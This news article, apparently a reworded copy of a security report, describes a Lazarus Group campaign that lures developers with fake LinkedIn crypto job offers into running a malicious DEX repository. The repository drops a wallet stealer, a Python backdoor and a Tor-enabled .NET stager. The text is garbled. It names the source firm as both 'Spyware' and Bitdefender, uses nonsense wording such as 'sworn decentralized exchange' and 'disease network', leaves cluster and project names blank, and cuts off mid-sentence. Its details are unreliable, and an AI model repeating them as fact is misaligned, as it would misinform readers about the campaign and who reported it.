A false LinkedIn job offer in the crypto and traveling sectors, as well as malware that can infect Windows, macOS, and Linux operating systems, has been linked to the North Korea-linked Lazarus Group.
According to security firm Spyware, the hoax begins with a message sent on a professional social media network, enticing them with the promise of remote work, part-time freedom, and good pay.
The scam requests a Resume or even a specific GitHub repository link once the goal expresses interest, according to a report shared with The Hacker News.
” Although evidently innocent, these requests is function wicked purposes, such as cutting personal information or lending a facade of legitimacy to the conversation”.
Once the necessary information is obtained, the attack moves to the next stage, where the threat actor, acting as a recruiter, posts a link to a GitHub or Bitbucket repository with a minimum viable product ( MVP ) version of a sworn decentralized exchange ( DEX ) project and asks the victim to check it out and offer their feedback.
An disguised script that is configured to get a next-stage payload from api is present in the code. npoint [. ] io is a cross-platform Browser information stealer that can eavesdrop on information from various bitcoin wallet extensions that might be installed on the victim’s browser.
The grabber also doubles as a loader to get a Python-based backdoor that is responsible for keeping track of changes to clipboard content, preserving frequent remote access, and removing additional malware.
The tactics described by Bitdefender’s exhibit overlap with a known attack activity cluster called ( also known as DeceptiveDevelopment and DEV#POPPER ), which is intended to drop a JavaScript stealer called BeaverTail and a Python implant known as InvisibleFerret.
The malware deployed by means of the Python malware is a.NET binary that can download and start a TOR proxy server to communicate with a command-and-control ( C2 ) server, exfiltrate basic system information, and deliver another payload that, in turn, can siphon sensitive data, log keystrokes, and launch a cryptocurrency miner.
The threat actors ‘ disease network is” complex, containing malicious software that is written in multiple programming languages and is used by a variety of technologies, including.NET-based stagers capable of disabling protection tools, setting up a Tor proxy, and launching crypto miners,” according to Bitdefender. These include multi-layered Python scripts that recursively decode and kill themselves, a JavaScript stealer that first gathers computer data before pivoting to additional payloads, and.NET-based stage
According to reports shared on and , there is evidence that these efforts are quite common, with minor adjustments to the overall attack chain. In some circumstances, candidates are required to clone a Web3 repository and install it locally as part of an interview, while in others, they are instructed to fix intentionally bugged code.
A project with the name “” is referenced in one of the Bitbucket repositories in question. It is no longer accessible through the code hosting platform.
The information comes a day after SentinelOne that another malware codenamed FlexibleFerret is being distributed through the Contagious Interview campaign.